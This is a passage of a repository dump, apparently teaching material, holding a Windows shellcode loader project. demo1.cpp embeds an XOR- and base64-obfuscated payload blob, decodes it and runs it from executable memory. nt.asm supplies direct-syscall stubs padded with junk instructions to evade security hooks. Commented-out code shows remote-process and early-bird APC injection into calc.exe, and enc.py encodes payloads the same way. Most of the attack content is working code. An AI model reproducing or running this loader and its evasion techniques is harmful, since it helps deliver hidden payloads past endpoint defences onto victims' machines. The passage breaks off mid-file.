insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate \nstatic std::string encode_pem(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate \nstatic std::string decode(String encoded_string, bool remove_linebreaks) {\n\t//\n\t// decode(? is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif // __cplusplus >= 201703L\n" }, { "path": "chapter4-demo2/demo1/base64.h", "content": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include \n\n#if __cplusplus >= 201703L\n#include \n#endif // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n" }, { "path": "chapter4-demo2/demo1/demo1.cpp", "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include \r\n#include \r\n#include \"header.h\"\r\n#include \"base64.h\"\r\n#include \"nt.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\n\r\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\r\n\r\n{\r\n\tstd::string str = inStr;\r\n\tstd::string::size_type stStart = 0;\r\n\tstd::string::iterator iter = str.begin();\r\n\twhile (iter != str.end())\r\n\r\n\t{\r\n\t\tstd::string::size_type st = str.find(pSrc, stStart);\r\n\r\n\t\tif (st == str.npos)\r\n\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\titer = iter + st - stStart;\r\n\t\tstr.replace(iter, iter + strlen(pSrc), pReplace);\r\n\t\titer = iter + strlen(pReplace);\r\n\t\tstStart = st + strlen(pReplace);\r\n\t}\r\n\r\n\treturn str;\r\n\r\n}\r\n\r\nLPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)\r\n{\r\n\tMEMORY_BASIC_INFORMATION mbi;\r\n\r\n\tfor (auto base : VC_PREF_BASES) {\r\n\t\tVirtualQueryEx(\r\n\t\t\thProc,\r\n\t\t\tbase,\r\n\t\t\t&mbi,\r\n\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t);\r\n\r\n\t\tif (MEM_FREE == mbi.State) {\r\n\t\t\tuint64_t i;\r\n\t\t\tfor (i = 0; i < cVmResv; ++i) {\r\n\t\t\t\tLPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));\r\n\t\t\t\tVirtualQueryEx(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentBase,\r\n\t\t\t\t\t&mbi,\r\n\t\t\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t\t\t);\r\n\t\t\t\tif (MEM_FREE != mbi.State)\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif (i == cVmResv) {\r\n\t\t\t\t// found suitable base\r\n\t\t\t\treturn base;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn nullptr;\r\n}\r\n\r\nint main()\r\n{\r\n\r\n\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ@@\";\r\n\r\n\tstd::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest3_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\r\n\r\n\tHANDLE hProc = OpenProcess(\r\n\t\tPROCESS_ALL_ACCESS,\r\n\t\tFALSE,\r\n\t\t8236\r\n\t);\r\n\r\n\tSYSTEM_INFO sys_inf;\r\n\tGetSystemInfo(&sys_inf);\r\n\r\n\tDWORD page_size{ sys_inf.dwPageSize };\r\n\tDWORD alloc_gran{ sys_inf.dwAllocationGranularity };\r\n\r\n\tSIZE_T szVmResv{ alloc_gran };\r\n\tSIZE_T szVmCmm{ page_size };\r\n\tDWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;\r\n\tDWORD cVmCmm = szVmResv / szVmCmm;\r\n\r\n\tLPVOID vmBaseAddress = GetSuitableBaseAddress(\r\n\t\thProc,\r\n\t\tszVmCmm,\r\n\t\tszVmResv,\r\n\t\tcVmResv\r\n\t);\r\n\tLPVOID currentVmBase{ vmBaseAddress };\r\n\tNTSTATUS status{ 0 };\r\n\tvector vcVmResv;\r\n\r\n\t//alloc memeory\r\n\tfor (int i = 1; i <= cVmResv; ++i)\r\n\t{\r\n\t\t\r\n\t\tstatus = BNtAVM(\r\n\t\t\thProc,\r\n\t\t\t¤tVmBase,\r\n\t\t\tNULL,\r\n\t\t\t&szVmResv,\r\n\t\t\tMEM_RESERVE,\r\n\t\t\tPAGE_NOACCESS\r\n\t\t);\r\n\t\tif (STATUS_SUCCESS == status) {\r\n\t\t\tvcVmResv.push_back(currentVmBase);\r\n\t\t}\r\n\t\telse {\r\n\r\n\t\t\tstd::cout << \"AVM error\";\r\n\t\t}\r\n\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);\r\n\t}\r\n\r\n\tDWORD offsetSc{ 0 };\r\n\tDWORD oldProt;\r\n\r\n\tdouble prcDone{ 0 };\r\n\r\n\tDWORD cmm_i;\r\n\tfor (int i = 0; i < cVmResv; ++i)\r\n\t{\r\n\t\tunsigned char* sc = new unsigned char[szVmCmm];\r\n\t\tfor (int j = 0; j < szVmCmm; j++) {\r\n\t\t\t//cout << szVmCmm * i + j << endl;\r\n\t\t\tsc[j] = S[szVmCmm * i + j] ^ XOR_KEY;\r\n\t\t}\r\n\r\n\t\tvoid* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tmemcpy(exec, sc, rest2_decoded.length());\r\n\r\n\t\t((void(*)())exec)();\r\n\r\n\r\n\t\t/*\r\n\t\tfor (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)\r\n\t\t{\r\n\r\n\t\t\tDWORD offset = (cmm_i * szVmCmm);\r\n\t\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);\r\n\r\n\t\t\tstatus = BNtAVM(\r\n\t\t\t\thProc,\r\n\t\t\t\t¤tVmBase,\r\n\t\t\t\tNULL,\r\n\t\t\t\t&szVmCmm,\r\n\t\t\t\tMEM_COMMIT,\r\n\t\t\t\tPAGE_READWRITE\r\n\t\t\t);\r\n\r\n\r\n\t\t\tSIZE_T szWritten{ 0 };\r\n\t\t\t\r\n\t\t\t\tstatus = BNtWVM(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentVmBase,\r\n\t\t\t\t\t&sc[offset],\r\n\t\t\t\t\tszVmCmm,\r\n\t\t\t\t\t&szWritten\r\n\t\t\t\t);\r\n\t\t\t\r\n\r\n\t\t\toffsetSc += szVmCmm;\r\n\r\n\t\t\tstatus = BNtPVM(\r\n\t\t\t\thProc,\r\n\t\t\t\t¤tVmBase,\r\n\t\t\t\t&szVmCmm,\r\n\t\t\t\tPAGE_EXECUTE_READ,\r\n\t\t\t\t&oldProt\r\n\t\t\t);\r\n\t\t}*/\r\n\r\n\r\n\t\r\n\t}\r\n\r\n\r\n\r\n\r\n\t/*\r\n\tfor (int i = 0; i < rest2_decoded.length(); i++) {\r\n\r\n\t\tsc[i] = S[i] ^ 8;\r\n\t}\r\n\r\n\r\n\r\n\t\r\n\tfor (int i=0; i < rest2_decoded.length(); i++) {\r\n\t\r\n\t\tsc_rev[i] = sc[rest2_decoded.length() - i-1];\r\n\t\r\n\t}*/\r\n\r\n\t/*\r\n\r\n\t\r\n\tvoid * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tmemcpy(exec, sc_rev, rest2_decoded.length());\r\n\t\r\n\t\r\n\r\n\t//unsigned const char* S=\r\n\r\n\t((void(*)())exec)();\r\n\t*/\r\n\r\n\t/*\r\n\tCreateThread \r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL, \r\n\t\t0, \r\n\t\t(LPTHREAD_START_ROUTINE)exec, \r\n\t\tNULL, \r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\t/*\r\n\teariler bird APC\r\n\r\n\tSIZE_T shellSize = szSc;\r\n\tSTARTUPINFOA si = { 0 };\r\n\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\tHANDLE victimProcess = pi.hProcess;\r\n\tHANDLE threadHandle = pi.hThread;\r\n\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\tWriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);\r\n\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\tResumeThread(threadHandle);\r\n\t*/\r\n\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n// 1. Use the Solution Explorer window to add/manage files\r\n// 2. Use the Team Explorer window to connect to source control\r\n// 3. Use the Output window to see build output and other messages\r\n// 4. Use the Error List window to view errors\r\n// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n" }, { "path": "chapter4-demo2/demo1/demo1.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n {1876F365-2DEC-42C9-B80E-B631B26FCAD8}\r\n Win32Proj\r\n demo1\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n CppCode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo2/demo1/demo1.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;hm;inl;inc;ipp;xsd\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Resource Files\r\n \r\n \r\n Resource Files\\Header Files\r\n \r\n \r\n Resource Files\\Header Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n" }, { "path": "chapter4-demo2/demo1/demo1.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "chapter4-demo2/demo1/nt.asm", "content": ".code\r\n\r\n\r\nbye :\r\nret\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r\nsub r8, r10\r\nadd eax, 18h; 1507 +\r\nxor r8, r8\r\nsyscall\r\nret\r\nBNtAVM endp\r\n\r\n\r\nBNtWVM proc\r\nadd rcx, 0Ah\r\nxor eax, eax\r\nmov r10, rcx\r\nadd eax, 3Ah; 1507 +\r\nsub r10, 0Ah\r\nsub rcx, 0Ah\r\nsyscall\r\nret\r\nBNtWVM endp\r\n\r\n\r\nBNtPVM proc\r\nadd r10, 1Ch\r\nxor eax, eax\r\nmov r10, rcx\r\nsub r10, 01h\r\nadd eax, 50h; 1507 +\r\nadd r10, 01h\r\nsyscall\r\nret\r\nBNtPVM endp\r\n\r\n\r\nend" }, { "path": "chapter4-demo2/demo1/nt.h", "content": "#pragma once\r\n#include \r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tULONG_PTR ZeroBits,\r\n\tPSIZE_T RegionSize,\r\n\tULONG AllocationType,\r\n\tULONG Protect\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtWVM(\r\n\tHANDLE hProcess,\r\n\tPVOID lpBaseAddress,\r\n\tPVOID lpBuffer,\r\n\tSIZE_T NumberOfBytesToRead,\r\n\tPSIZE_T NumberOfBytesRead\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtPVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tSIZE_T* NumberOfBytesToProtect,\r\n\tULONG NewAccessProtection,\r\n\tPULONG OldAccessProtection\r\n);\r\n" }, { "path": "chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo2/demo1/x64/Debug/demo1.log", "content": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\last\\demo1\\|\r\n" }, { "path": "chapter4-demo2/demo1/x64/Release/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\last\\demo1\\x64\\Release\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo2/demo1/x64/Release/demo1.log", "content": " demo1.cpp\r\nE:\\last\\demo1\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo1\\demo1\\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(139,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(140,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(145,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(144,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(153,20): warning C4018: “<=”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(180,20): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(179,12): warning C4101: “cmm_i”: 未引用的局部变量\r\nE:\\last\\demo1\\demo1\\demo1.cpp(175,18): warning C4101: “oldProt”: 未引用的局部变量\r\n 正在生成代码\r\n 已完成代码的生成\r\n 1 of 225 functions ( 0.4%) were compiled, the rest were copied from previous compilation.\r\n 0 functions were new in current compilation\r\n 0 functions had inline decision re-evaluated but remain unchanged\r\n demo1.vcxproj -> E:\\last\\demo1\\x64\\Release\\demo1.exe\r\n" }, { "path": "chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\last\\demo1\\|\r\n" }, { "path": "chapter4-demo2/demo1.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "chapter4-demo2/enc.py", "content": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^8)\r\n #print(bytearray(array))\r\n print(base64.b64encode(bytearray(array)))" }, { "path": "chapter4-demo3/demo1/Debug/demo1.log", "content": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate", "content": 